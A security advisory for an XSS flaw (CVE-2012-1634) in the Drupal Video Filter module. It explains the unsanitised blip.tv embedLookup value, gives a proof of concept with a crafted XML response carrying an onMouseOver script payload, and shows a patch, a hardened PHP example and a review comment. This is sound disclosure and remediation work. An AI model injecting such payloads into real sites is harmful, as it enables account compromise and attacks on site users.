Drupal Video Filter 6.x-2.8 XSS Vulnerability

12 January 2012

CVE: CVE-2012-1634

Description of Vulnerability:

Drupal (http://drupal.org) is a robust content management system (CMS) written in PHP and MySQL. The Drupal Video Filter module (http://drupal.org/project/video_filter) "is a highly flexible and easy extendable filter module to embed any type of video in your site using a simple tag. Other modules can add video sites/formats (called codecs) using an easy plug-in architecture." The Video Filter module contains an arbitrary HTML injection vulnerability (also known as cross site scripting, or XSS) because it fails to sanitize user supplied third party data before display.

Systems affected:

Drupal 6.22 with Video Filter 6.x-2.8 was tested and shown to be vulnerable.

Impact:

Attackers could inject arbitrary scripts into pages affecting site users. This could result in administrative account compromise leading to web server process compromise. A more likely scenario would be for an attacker to inject hidden content (such as iframes, applets, or embedded objects) that would attack client browsers in an attempt to compromise site users' machines. This vulnerability could also be used to launch cross site request forgery (XSRF) attacks against the site that could have other unexpected consequences.

Mitigating factors:

In order to exploit this vulnerability the attacker must be able to either control the source of third party data or manipulate it in transit. This could be accomplished with a man in the middle (MITM) attack. Certain HTTP responses need to contain malicious code for this exploitation, which could be accomplished by modifying data on the wire (or over wireless). Furthermore, this flaw only affects videos rendered using the video_filter_bliptv() function. Because the module makes requests as nodes are rendered (and cached) the XSS is transient and will only survive the lifetime of the cache unless the attacker can maintain control of, or manipulate, the source of the HTTP response from the URL specified in the video field tag in the Drupal node text.
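The pattern described above, as an added PHP example that is not code from the Video Filter module or from this advisory: a value taken from a third party XML response is concatenated into an HTML attribute, so a double quote in that value ends the attribute and injects an event handler. The function names, the shortened blip.tv-style response and the use of SimpleXML (the module uses its own parser) are assumptions made for the illustration; the hardened path allow-lists the id with preg_replace() and escapes it at output, with htmlspecialchars() standing in for Drupal's check_plain().

```php
<?php
// Added example modelling the defect behind CVE-2012-1634; not the module's own code.
// Constructed response: a cut-down blip.tv-style body carrying the attribute-breaking
// embedLookup value from the advisory's proof of concept.
$constructed_response = <<<EOD
<response>
  <status>OK</status>
  <payload>
    <asset lang="en">
      <embedLookup>AYfiBwI" onMouseOver="javascript:alert('xss');</embedLookup>
      <embedUrl type="application/x-shockwave-flash">http://blip.tv/play/AYfiBwI</embedUrl>
    </asset>
  </payload>
</response>
EOD;

/**
 * Pull the embedLookup text out of the response body (hypothetical helper).
 * Returns NULL when the body does not parse or the element is missing.
 */
function video_filter_extract_embed_lookup($xml_body) {
  $xml = @simplexml_load_string($xml_body);
  if ($xml === FALSE || !isset($xml->payload->asset->embedLookup)) {
    return NULL;
  }
  return (string) $xml->payload->asset->embedLookup;
}

/**
 * Allow-list the identifier (hypothetical helper). Lookup ids such as
 * "AYfiBwI" are purely alphanumeric, so every other character is dropped.
 * preg_replace() is used instead of the deprecated ereg_replace().
 */
function video_filter_safe_id($raw_id) {
  return preg_replace('/[^A-Za-z0-9]/', '', $raw_id);
}

/**
 * Vulnerable pattern: the raw id is dropped straight into a double-quoted
 * src attribute, so the quote inside the id terminates the attribute and
 * the rest of the value becomes a new attribute on the element.
 */
function video_filter_render_vulnerable($id) {
  return '<embed src="http://blip.tv/play/' . $id
    . '" type="application/x-shockwave-flash"></embed>';
}

/**
 * Hardened pattern: allow-list first, then escape at the output boundary
 * as well (defence in depth, in case the allow-list is ever loosened).
 */
function video_filter_render_hardened($id) {
  $safe = htmlspecialchars(video_filter_safe_id($id), ENT_QUOTES, 'UTF-8');
  return '<embed src="http://blip.tv/play/' . $safe
    . '" type="application/x-shockwave-flash"></embed>';
}

$raw = video_filter_extract_embed_lookup($constructed_response);
echo "raw id:     " . $raw . "\n";
echo "vulnerable: " . video_filter_render_vulnerable($raw) . "\n";
echo "hardened:   " . video_filter_render_hardened($raw) . "\n";
```

Running the script shows the vulnerable line carrying an onMouseOver attribute that the response author controls, while the hardened line reduces the id to AYfiBwI. The allow-list is the real fix here; the output escaping only matters if a future id format needs characters outside that set.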

Proof of concept exploit:

1. Install Drupal 6.22 and Video Filter 6.x-2.8
2. To avoid setting up a malicious proxy or hostile web site, manually overwrite the $result->data variable that holds the body of the drupal_http_request() response at line 307 of video_filter.codecs.inc. Add the following PHP on the blank line 308. This is a valid response altered to include a malicious embedLookup tag value:

$result->data = <<<EOD
<response>
	<current_time>2011-10-03T17:14:32Z</current_time>
	<timestamp>1317662072501</timestamp>
	
<status>OK</status>
<payload>

<asset lang="en">
	<id>127139</id>

	<item_type>file</item_type>
	<item_id>123456</item_id>
	<guid>44C681A8-97D8-11DB-9C2C-80C8F4A79447</guid>
	<deleted>false</deleted>
	
	<modified>1167464642774</modified>
	
	<title>Klog - Episode 13</title>

	<links>
		<link rel="alternate" type="text/html" href="http://blip.tv/file/123456" />
		<link rel="alternate" type="text/xml" href="http://blip.tv/file/123456/?skin=api" />
		<link rel="service.edit" type="text/html" href="http://blip.tv/file/post/123456/" />
		<link rel="alternate" type="application/rss+xml" href="http://blip.tv/rss/127139" />
		<link rel="alternate" type="application/atom+xml" href="http://blip.tv/file/123456/?skin=atom" />
		<link rel="service.edit" type="text/xml" href="http://blip.tv/file/post/123456/?skin=api" />
	</links>
	<timestamp>1167464106018</timestamp>

	<latitude></latitude>
	<longitude></longitude>
	<explicit>false</explicit>
	<license>
		<name>No license (All rights reserved)</name>
		
	</license>
	<createdBy>
		<login>lotusreaver</login>

		<uid>7970</uid>
		<links>
			<link type="text/html" href="http://blip.tv/users/view/lotusreaver" />
			<link type="application/rdf+xml" href="http://blip.tv/users/view/lotusreaver" />
			<link type="application/rss+xml" href="http://lotusreaver.blip.tv/rss" />
			<link type="application/rss+atom" href="http://lotusreaver.blip.tv/posts/?skin=atom" />
		</links>
	</createdBy>

	<description mode="escaped" type="text/html"></description>
	<notes mode="escaped" type="text/html"></notes>
	<tags>
		
	</tags>
	<mediaList>
		
		<media>
			<role>Source</role>
			<link type="video/ms-wmv" href="http://blip.tv/file/get/Lotusreaver-KlogEpisode13172.wmv" />

			<width>320</width>
			<height>240</height>
			<duration>393</duration>
			<videocodec>wmv9dmo</videocodec>
			<audiocodec>ffwmav2</audiocodec>
			<bitrate></bitrate>

			<audiobitrate>64</audiobitrate>
			<videobitrate>0</videobitrate>
			<size>23892133</size>
		</media>
		
		<media>
			<role>web</role>
			<link type="video/x-flv" href="http://blip.tv/file/get/Lotusreaver-KlogEpisode13172.flv" />

			<width>320</width>
			<height>240</height>
			<duration>393</duration>
			<videocodec></videocodec>
			<audiocodec></audiocodec>
			<bitrate></bitrate>
			<audiobitrate>0</audiobitrate>

			<videobitrate>0</videobitrate>
			<size>22951160</size>
		</media>
		
	</mediaList>
	
	
	<darkMeta><![CDATA[
		
	]]></darkMeta>
	<embedLookup>AYfiBwI" onMouseOver="javascript:alert('xss');</embedLookup>
	<embedUrl type="application/x-shockwave-flash">http://blip.tv/play/AYfiBwI</embedUrl>

	<embedCode><iframe src="http://blip.tv/play/AYfiBwI.html" width="480" height="390" frameborder="0" allowfullscreen></iframe><embed type="application/x-shockwave-flash" src="http://a.blip.tv/api.swf#AYfiBwI" style="display:none"></embed></embedCode>

</asset>

</payload>


</response>
	
EOD;
3. Install the Video Filter module and enable it
4. Apply the video filter to content types at ?q=admin/settings/filters by clicking 'configure' and checking the checkbox next to "Video Filter"
5. Create a new piece of content using the input format from step 4 at ?q=node/add/story (for example, a new Story node).
6. In the body include the text "[video:http://blip.tv/file/123456]"
7. Save the node, then mouse over the video to execute the JavaScript alert box.

Patch:

Applying the following patch mitigates this issue in version 6.x-2.8.

--- video_filter/video_filter.codecs.inc	2011-03-16 17:31:00.000000000 -0400
+++ video_filter.fixed/video_filter.codecs.inc	2011-10-01 16:25:08.486554250 -0400
@@ -337,7 +337,7 @@ function video_filter_bliptv($video) {
         $start_level--;
       }
     }
-    $id = $response['EMBEDLOOKUP'][0];
+    $id = ereg_replace("[^A-Za-z0-9]", "", $response['EMBEDLOOKUP'][0]);
   }
   
   $video['source'] = 'http://blip.tv/play/' . $id;
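Review bot: the allow-list on the `+` line is the right shape, but `ereg_replace()` is deprecated since PHP 5.3 (it raises E_DEPRECATED) and is removed in PHP 7, so the replacement should be written with the PCRE equivalent: `$id = preg_replace("/[^A-Za-z0-9]/", "", $response['EMBEDLOOKUP'][0]);`. The lookup ids seen in the proof of concept (`AYfiBwI`) are purely alphanumeric, so the filter does not break legitimate values. Since `$id` is concatenated straight into `$video['source']` in the trailing context, it is also worth escaping the source with check_plain() at the point where it reaches markup, as defence in depth should the allow-list ever be relaxed.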